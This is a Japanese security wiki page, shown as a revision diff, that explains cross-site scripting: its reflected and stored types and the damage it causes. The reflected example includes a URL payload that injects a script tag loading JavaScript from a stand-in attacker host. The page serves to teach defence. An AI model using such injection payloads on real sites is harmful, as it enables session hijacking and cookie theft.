「XSS」の版間の差分

提供: セキュリティ
移動: 案内検索
(ページの作成:「XSS は、 Cross Site Scripting の略です。 読み方 :XSS ::えっくすえすえす :Cross Site Scripting ::クロスサイトスクリプティング __TOC__ ...」)
 
行1: 行1:
XSS は、 Cross Site Scripting の略です。
+
[[XSS]] は、 Cross Site Scripting の略です。悪意ある第三者が[[JavaScript]]をページのクエリや[[CGM]](掲示板など)のコメントとして書き込み、ウェブページに悪意ある[[JavaScript]]を埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。
  
 
読み方
 
読み方

2013年5月6日 (月) 01:38時点における版

XSS は、 Cross Site Scripting の略です。悪意ある第三者がJavaScriptをページのクエリやCGM(掲示板など)のコメントとして書き込み、ウェブページに悪意あるJavaScriptを埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。

読み方

XSS
えっくすえすえす
Cross Site Scripting
クロスサイトスクリプティング


概要

以下のタイプが存在します。

  • 折り返し型 XSS ( Reflected XSS )
    • フィッシングメール、攻撃用 Web サーバの利用
  • 蓄積型 XSS (Stored XSS)
    • SNS, 掲示板、ブログ

被害

JavaScript で実現可能なこと範囲で、被害を受ける。

  • Cookie の漏洩
  • 情報漏えい
  • Web ページの改ざん
  • マルウェアの感染
  • 別のサイトへの誘導

Reflected XSS

  1. http://example.com/?id=<script src="http://eval.com/bad.js"></script>
    へユーザを送り込む。
  2. ユーザが example.com にアクセスすると、 example.com は、 id の値をそのままエコーバックする。
  3. example.com のページは、 eval.com/bad.js をロードし、 example.com の権限で実行される。

Stored XSS

  1. 掲示板に「悪意のあるスクリプト」を書き込む。
    <script>
    悪意のあるスクリプト
    </script>
  2. その掲示板に第三者がアクセスする。
  3. 「悪意のあるスクリプト」を含む HTML ページがロードされる。
  4. 第三者のブラウザで、「悪意のあるスクリプト」が実行される。

関連情報